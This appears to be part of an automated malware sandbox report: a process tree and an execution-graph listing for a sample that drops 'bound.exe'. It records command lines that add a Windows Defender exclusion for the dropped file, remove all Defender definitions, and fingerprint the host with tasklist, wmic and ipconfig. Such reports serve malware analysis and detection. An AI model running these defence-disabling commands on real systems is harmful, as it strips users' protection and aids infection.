                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff7738f0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                            Imagebase:0x7ff7738f0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:bound.exe
                                                                                                                                                                                                                            Imagebase:0x254b4b60000
                                                                                                                                                                                                                            File size:819'200 bytes
                                                                                                                                                                                                                            MD5 hash:2A4DCF20B82896BE94EB538260C5FB93
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff7cf080000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                            Start time:13:44:27
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                            Imagebase:0x7ff620410000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                            Start time:13:44:27
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"cmd" /c ipconfig /all
                                                                                                                                                                                                                            Imagebase:0x7ff7738f0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                            Start time:13:44:27
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                            Start time:13:44:28
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:ipconfig /all
                                                                                                                                                                                                                            Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                            File size:35'840 bytes
                                                                                                                                                                                                                            MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                            Start time:13:44:32
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                            Imagebase:0x7ff72d8c0000
                                                                                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                            Start time:13:44:38
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 7976 -s 2228
                                                                                                                                                                                                                            Imagebase:0x7ff6d96a0000
                                                                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                            Start time:13:44:39
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                            Imagebase:0x7ff6496b0000
                                                                                                                                                                                                                            File size:468'120 bytes
                                                                                                                                                                                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:8.7%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:19.9%
                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                              Total number of Limit Nodes:31
                                                                                                                                                                                                                              execution_graph 18878 7ff7ead2adfe 18879 7ff7ead2ae17 18878->18879 18880 7ff7ead2ae0d 18878->18880 18882 7ff7ead20338 LeaveCriticalSection 18880->18882 19115 7ff7ead1f98c 19116 7ff7ead1fb7e 19115->19116 19118 7ff7ead1f9ce _isindst 19115->19118 19117 7ff7ead14f08 _set_fmode 11 API calls 19116->19117 19135 7ff7ead1fb6e 19117->19135 19118->19116 19121 7ff7ead1fa4e _isindst 19118->19121 19119 7ff7ead0c550 _log10_special 8 API calls 19120 7ff7ead1fb99 19119->19120 19136 7ff7ead26194 19121->19136 19126 7ff7ead1fbaa 19128 7ff7ead1a900 _isindst 17 API calls 19126->19128 19129 7ff7ead1fbbe 19128->19129 19133 7ff7ead1faab 19133->19135 19160 7ff7ead261d8 19133->19160 19135->19119 19137 7ff7ead261a3 19136->19137 19140 7ff7ead1fa6c 19136->19140 19167 7ff7ead202d8 EnterCriticalSection 19137->19167 19142 7ff7ead25598 19140->19142 19143 7ff7ead1fa81 19142->19143 19144 7ff7ead255a1 19142->19144 19143->19126 19148 7ff7ead255c8 19143->19148 19145 7ff7ead14f08 _set_fmode 11 API calls 19144->19145 19146 7ff7ead255a6 19145->19146 19147 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19146->19147 19147->19143 19149 7ff7ead1fa92 19148->19149 19150 7ff7ead255d1 19148->19150 19149->19126 19154 7ff7ead255f8 19149->19154 19151 7ff7ead14f08 _set_fmode 11 API calls 19150->19151 19152 7ff7ead255d6 19151->19152 19153 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19152->19153 19153->19149 19155 7ff7ead1faa3 19154->19155 19156 7ff7ead25601 19154->19156 19155->19126 19155->19133 19157 7ff7ead14f08 _set_fmode 11 API calls 19156->19157 19158 7ff7ead25606 19157->19158 19159 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19158->19159 19159->19155 19168 7ff7ead202d8 EnterCriticalSection 19160->19168 18982 7ff7ead15410 18983 7ff7ead1541b 18982->18983 18991 7ff7ead1f2a4 18983->18991 19004 7ff7ead202d8 EnterCriticalSection 18991->19004 18820 7ff7ead0bae0 18821 7ff7ead0bb0e 18820->18821 18822 7ff7ead0baf5 18820->18822 18822->18821 18824 7ff7ead1d5fc 12 API calls 18822->18824 18823 7ff7ead0bb6e 18824->18823 18825 7ff7ead19961 18826 7ff7ead1a3d8 45 API calls 18825->18826 18827 7ff7ead19966 18826->18827 18828 7ff7ead199d7 18827->18828 18829 7ff7ead1998d GetModuleHandleW 18827->18829 18837 7ff7ead19864 18828->18837 18829->18828 18835 7ff7ead1999a 18829->18835 18835->18828 18851 7ff7ead19a88 GetModuleHandleExW 18835->18851 18857 7ff7ead202d8 EnterCriticalSection 18837->18857 18852 7ff7ead19abc GetProcAddress 18851->18852 18853 7ff7ead19ae5 18851->18853 18854 7ff7ead19ace 18852->18854 18855 7ff7ead19aea FreeLibrary 18853->18855 18856 7ff7ead19af1 18853->18856 18854->18853 18855->18856 18856->18828 19005 7ff7ead2abe3 19006 7ff7ead2abf3 19005->19006 19009 7ff7ead15478 LeaveCriticalSection 19006->19009 19199 7ff7ead2ad69 19202 7ff7ead15478 LeaveCriticalSection 19199->19202 16342 7ff7ead0cc3c 16363 7ff7ead0ce0c 16342->16363 16345 7ff7ead0cd88 16517 7ff7ead0d12c IsProcessorFeaturePresent 16345->16517 16346 7ff7ead0cc58 __scrt_acquire_startup_lock 16348 7ff7ead0cd92 16346->16348 16350 7ff7ead0cc76 __scrt_release_startup_lock 16346->16350 16349 7ff7ead0d12c 7 API calls 16348->16349 16351 7ff7ead0cd9d __GetCurrentState 16349->16351 16352 7ff7ead0cc9b 16350->16352 16353 7ff7ead0cd21 16350->16353 16506 7ff7ead19b2c 16350->16506 16369 7ff7ead0d274 16353->16369 16355 7ff7ead0cd26 16372 7ff7ead01000 16355->16372 16360 7ff7ead0cd49 16360->16351 16513 7ff7ead0cf90 16360->16513 16364 7ff7ead0ce14 16363->16364 16365 7ff7ead0ce20 __scrt_dllmain_crt_thread_attach 16364->16365 16366 7ff7ead0cc50 16365->16366 16367 7ff7ead0ce2d 16365->16367 16366->16345 16366->16346 16367->16366 16524 7ff7ead0d888 16367->16524 16370 7ff7ead2a4d0 __scrt_get_show_window_mode 16369->16370 16371 7ff7ead0d28b GetStartupInfoW 16370->16371 16371->16355 16373 7ff7ead01009 16372->16373 16551 7ff7ead15484 16373->16551 16375 7ff7ead037fb 16558 7ff7ead036b0 16375->16558 16378 7ff7ead03808 __vcrt_freefls 16380 7ff7ead0c550 _log10_special 8 API calls 16378->16380 16382 7ff7ead03ca7 16380->16382 16511 7ff7ead0d2b8 GetModuleHandleW 16382->16511 16383 7ff7ead0383c 16718 7ff7ead01c80 16383->16718 16384 7ff7ead0391b 16727 7ff7ead045c0 16384->16727 16388 7ff7ead0385b 16630 7ff7ead08830 16388->16630 16389 7ff7ead0396a 16750 7ff7ead02710 16389->16750 16393 7ff7ead0388e 16400 7ff7ead038bb __vcrt_freefls 16393->16400 16722 7ff7ead089a0 16393->16722 16394 7ff7ead0395d 16395 7ff7ead03984 16394->16395 16396 7ff7ead03962 16394->16396 16399 7ff7ead01c80 49 API calls 16395->16399 16746 7ff7ead1004c 16396->16746 16401 7ff7ead039a3 16399->16401 16402 7ff7ead08830 14 API calls 16400->16402 16410 7ff7ead038de __vcrt_freefls 16400->16410 16405 7ff7ead01950 115 API calls 16401->16405 16402->16410 16404 7ff7ead03a0b 16406 7ff7ead089a0 40 API calls 16404->16406 16407 7ff7ead039ce 16405->16407 16408 7ff7ead03a17 16406->16408 16407->16388 16409 7ff7ead039de 16407->16409 16411 7ff7ead089a0 40 API calls 16408->16411 16412 7ff7ead02710 54 API calls 16409->16412 16415 7ff7ead0390e __vcrt_freefls 16410->16415 16761 7ff7ead08940 16410->16761 16413 7ff7ead03a23 16411->16413 16412->16378 16414 7ff7ead089a0 40 API calls 16413->16414 16414->16415 16416 7ff7ead08830 14 API calls 16415->16416 16417 7ff7ead03a3b 16416->16417 16418 7ff7ead03b2f 16417->16418 16419 7ff7ead03a60 __vcrt_freefls 16417->16419 16420 7ff7ead02710 54 API calls 16418->16420 16421 7ff7ead08940 40 API calls 16419->16421 16422 7ff7ead03aab 16419->16422 16420->16378 16421->16422 16423 7ff7ead08830 14 API calls 16422->16423 16424 7ff7ead03bf4 __vcrt_freefls 16423->16424 16425 7ff7ead03c46 16424->16425 16426 7ff7ead03d41 16424->16426 16427 7ff7ead03cd4 16425->16427 16428 7ff7ead03c50 16425->16428 16768 7ff7ead044e0 16426->16768 16431 7ff7ead08830 14 API calls 16427->16431 16643 7ff7ead090e0 16428->16643 16434 7ff7ead03ce0 16431->16434 16432 7ff7ead03d4f 16435 7ff7ead03d65 16432->16435 16436 7ff7ead03d71 16432->16436 16438 7ff7ead03c61 16434->16438 16441 7ff7ead03ced 16434->16441 16771 7ff7ead04630 16435->16771 16437 7ff7ead01c80 49 API calls 16436->16437 16449 7ff7ead03cc8 __vcrt_freefls 16437->16449 16444 7ff7ead02710 54 API calls 16438->16444 16445 7ff7ead01c80 49 API calls 16441->16445 16442 7ff7ead03dc4 16693 7ff7ead09390 16442->16693 16444->16378 16446 7ff7ead03d0b 16445->16446 16448 7ff7ead03d12 16446->16448 16446->16449 16452 7ff7ead02710 54 API calls 16448->16452 16449->16442 16450 7ff7ead03da7 SetDllDirectoryW LoadLibraryExW 16449->16450 16450->16442 16451 7ff7ead03dd7 SetDllDirectoryW 16454 7ff7ead03e0a 16451->16454 16495 7ff7ead03e5a 16451->16495 16452->16378 16456 7ff7ead08830 14 API calls 16454->16456 16455 7ff7ead04008 16458 7ff7ead04035 16455->16458 16459 7ff7ead04012 PostMessageW GetMessageW 16455->16459 16462 7ff7ead03e16 __vcrt_freefls 16456->16462 16457 7ff7ead03f1b 16698 7ff7ead033c0 16457->16698 16848 7ff7ead03360 16458->16848 16459->16458 16465 7ff7ead03ef2 16462->16465 16469 7ff7ead03e4e 16462->16469 16468 7ff7ead08940 40 API calls 16465->16468 16468->16495 16469->16495 16774 7ff7ead06dc0 16469->16774 16495->16455 16495->16457 16507 7ff7ead19b64 16506->16507 16508 7ff7ead19b43 16506->16508 18815 7ff7ead1a3d8 16507->18815 16508->16353 16512 7ff7ead0d2c9 16511->16512 16512->16360 16515 7ff7ead0cfa1 16513->16515 16514 7ff7ead0cd60 16514->16352 16515->16514 16516 7ff7ead0d888 7 API calls 16515->16516 16516->16514 16518 7ff7ead0d152 _isindst __scrt_get_show_window_mode 16517->16518 16519 7ff7ead0d171 RtlCaptureContext RtlLookupFunctionEntry 16518->16519 16520 7ff7ead0d19a RtlVirtualUnwind 16519->16520 16521 7ff7ead0d1d6 __scrt_get_show_window_mode 16519->16521 16520->16521 16522 7ff7ead0d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16521->16522 16523 7ff7ead0d256 _isindst 16522->16523 16523->16348 16525 7ff7ead0d89a 16524->16525 16526 7ff7ead0d890 16524->16526 16525->16366 16530 7ff7ead0dc24 16526->16530 16531 7ff7ead0d895 16530->16531 16532 7ff7ead0dc33 16530->16532 16534 7ff7ead0dc90 16531->16534 16538 7ff7ead0de60 16532->16538 16535 7ff7ead0dcbb 16534->16535 16536 7ff7ead0dc9e DeleteCriticalSection 16535->16536 16537 7ff7ead0dcbf 16535->16537 16536->16535 16537->16525 16542 7ff7ead0dcc8 16538->16542 16543 7ff7ead0ddb2 TlsFree 16542->16543 16549 7ff7ead0dd0c __vcrt_InitializeCriticalSectionEx 16542->16549 16544 7ff7ead0dd3a LoadLibraryExW 16546 7ff7ead0ddd9 16544->16546 16547 7ff7ead0dd5b GetLastError 16544->16547 16545 7ff7ead0ddf9 GetProcAddress 16545->16543 16546->16545 16548 7ff7ead0ddf0 FreeLibrary 16546->16548 16547->16549 16548->16545 16549->16543 16549->16544 16549->16545 16550 7ff7ead0dd7d LoadLibraryExW 16549->16550 16550->16546 16550->16549 16554 7ff7ead1f480 16551->16554 16552 7ff7ead1f4d3 16553 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 16552->16553 16557 7ff7ead1f4fc 16553->16557 16554->16552 16555 7ff7ead1f526 16554->16555 16861 7ff7ead1f358 16555->16861 16557->16375 16869 7ff7ead0c850 16558->16869 16561 7ff7ead03710 16871 7ff7ead09280 FindFirstFileExW 16561->16871 16562 7ff7ead036eb GetLastError 16876 7ff7ead02c50 16562->16876 16565 7ff7ead03706 16570 7ff7ead0c550 _log10_special 8 API calls 16565->16570 16567 7ff7ead03723 16891 7ff7ead09300 CreateFileW 16567->16891 16568 7ff7ead0377d 16902 7ff7ead09440 16568->16902 16573 7ff7ead037b5 16570->16573 16572 7ff7ead0378b 16572->16565 16578 7ff7ead02810 49 API calls 16572->16578 16573->16378 16580 7ff7ead01950 16573->16580 16575 7ff7ead03734 16894 7ff7ead02810 16575->16894 16576 7ff7ead0374c __vcrt_InitializeCriticalSectionEx 16576->16568 16578->16565 16581 7ff7ead045c0 108 API calls 16580->16581 16582 7ff7ead01985 16581->16582 16583 7ff7ead01c43 16582->16583 16585 7ff7ead07f90 83 API calls 16582->16585 16584 7ff7ead0c550 _log10_special 8 API calls 16583->16584 16586 7ff7ead01c5e 16584->16586 16587 7ff7ead019cb 16585->16587 16586->16383 16586->16384 16629 7ff7ead01a03 16587->16629 17266 7ff7ead106d4 16587->17266 16589 7ff7ead1004c 74 API calls 16589->16583 16590 7ff7ead019e5 16591 7ff7ead019e9 16590->16591 16592 7ff7ead01a08 16590->16592 16593 7ff7ead14f08 _set_fmode 11 API calls 16591->16593 17270 7ff7ead1039c 16592->17270 16595 7ff7ead019ee 16593->16595 17273 7ff7ead02910 16595->17273 16598 7ff7ead01a26 16600 7ff7ead14f08 _set_fmode 11 API calls 16598->16600 16599 7ff7ead01a45 16602 7ff7ead01a5c 16599->16602 16603 7ff7ead01a7b 16599->16603 16601 7ff7ead01a2b 16600->16601 16604 7ff7ead02910 54 API calls 16601->16604 16605 7ff7ead14f08 _set_fmode 11 API calls 16602->16605 16606 7ff7ead01c80 49 API calls 16603->16606 16604->16629 16607 7ff7ead01a61 16605->16607 16608 7ff7ead01a92 16606->16608 16609 7ff7ead02910 54 API calls 16607->16609 16610 7ff7ead01c80 49 API calls 16608->16610 16609->16629 16611 7ff7ead01add 16610->16611 16612 7ff7ead106d4 73 API calls 16611->16612 16613 7ff7ead01b01 16612->16613 16614 7ff7ead01b16 16613->16614 16615 7ff7ead01b35 16613->16615 16616 7ff7ead14f08 _set_fmode 11 API calls 16614->16616 16617 7ff7ead1039c _fread_nolock 53 API calls 16615->16617 16618 7ff7ead01b1b 16616->16618 16619 7ff7ead01b4a 16617->16619 16620 7ff7ead02910 54 API calls 16618->16620 16621 7ff7ead01b50 16619->16621 16622 7ff7ead01b6f 16619->16622 16620->16629 16623 7ff7ead14f08 _set_fmode 11 API calls 16621->16623 17288 7ff7ead10110 16622->17288 16625 7ff7ead01b55 16623->16625 16627 7ff7ead02910 54 API calls 16625->16627 16627->16629 16628 7ff7ead02710 54 API calls 16628->16629 16629->16589 16631 7ff7ead0883a 16630->16631 16632 7ff7ead09390 2 API calls 16631->16632 16633 7ff7ead08859 GetEnvironmentVariableW 16632->16633 16634 7ff7ead088c2 16633->16634 16635 7ff7ead08876 ExpandEnvironmentStringsW 16633->16635 16637 7ff7ead0c550 _log10_special 8 API calls 16634->16637 16635->16634 16636 7ff7ead08898 16635->16636 16638 7ff7ead09440 2 API calls 16636->16638 16639 7ff7ead088d4 16637->16639 16640 7ff7ead088aa 16638->16640 16639->16393 16641 7ff7ead0c550 _log10_special 8 API calls 16640->16641 16642 7ff7ead088ba 16641->16642 16642->16393 16644 7ff7ead090f5 16643->16644 17506 7ff7ead08570 GetCurrentProcess OpenProcessToken 16644->17506 16647 7ff7ead08570 7 API calls 16648 7ff7ead09121 16647->16648 16649 7ff7ead0913a 16648->16649 16650 7ff7ead09154 16648->16650 16651 7ff7ead026b0 48 API calls 16649->16651 16652 7ff7ead026b0 48 API calls 16650->16652 16653 7ff7ead09152 16651->16653 16654 7ff7ead09167 LocalFree LocalFree 16652->16654 16653->16654 16655 7ff7ead09183 16654->16655 16657 7ff7ead0918f 16654->16657 17516 7ff7ead02b50 16655->17516 16658 7ff7ead0c550 _log10_special 8 API calls 16657->16658 16659 7ff7ead03c55 16658->16659 16659->16438 16660 7ff7ead08660 16659->16660 16661 7ff7ead08678 16660->16661 16662 7ff7ead086fa GetTempPathW GetCurrentProcessId 16661->16662 16663 7ff7ead0869c 16661->16663 17525 7ff7ead025c0 16662->17525 16664 7ff7ead08830 14 API calls 16663->16664 16666 7ff7ead086a8 16664->16666 17532 7ff7ead081d0 16666->17532 16673 7ff7ead08728 __vcrt_freefls 16680 7ff7ead08765 __vcrt_freefls 16673->16680 17529 7ff7ead18b68 16673->17529 16694 7ff7ead093d6 16693->16694 16695 7ff7ead093b2 MultiByteToWideChar 16693->16695 16696 7ff7ead093f3 MultiByteToWideChar 16694->16696 16697 7ff7ead093ec __vcrt_freefls 16694->16697 16695->16694 16695->16697 16696->16697 16697->16451 16710 7ff7ead033ce __scrt_get_show_window_mode 16698->16710 16699 7ff7ead0c550 _log10_special 8 API calls 16701 7ff7ead03664 16699->16701 16700 7ff7ead035c7 16700->16699 16701->16378 16717 7ff7ead090c0 LocalFree 16701->16717 16703 7ff7ead01c80 49 API calls 16703->16710 16704 7ff7ead035e2 16706 7ff7ead02710 54 API calls 16704->16706 16706->16700 16709 7ff7ead035c9 16712 7ff7ead02710 54 API calls 16709->16712 16710->16700 16710->16703 16710->16704 16710->16709 16711 7ff7ead02a50 54 API calls 16710->16711 16715 7ff7ead035d0 16710->16715 17721 7ff7ead04560 16710->17721 17727 7ff7ead07e20 16710->17727 17739 7ff7ead01600 16710->17739 17787 7ff7ead07120 16710->17787 17791 7ff7ead04190 16710->17791 17835 7ff7ead04450 16710->17835 16711->16710 16712->16700 16716 7ff7ead02710 54 API calls 16715->16716 16716->16700 16719 7ff7ead01ca5 16718->16719 16720 7ff7ead14984 49 API calls 16719->16720 16721 7ff7ead01cc8 16720->16721 16721->16388 16723 7ff7ead09390 2 API calls 16722->16723 16724 7ff7ead089b4 16723->16724 16725 7ff7ead18238 38 API calls 16724->16725 16726 7ff7ead089c6 __vcrt_freefls 16725->16726 16726->16400 16728 7ff7ead045cc 16727->16728 16729 7ff7ead09390 2 API calls 16728->16729 16730 7ff7ead045f4 16729->16730 16731 7ff7ead09390 2 API calls 16730->16731 16732 7ff7ead04607 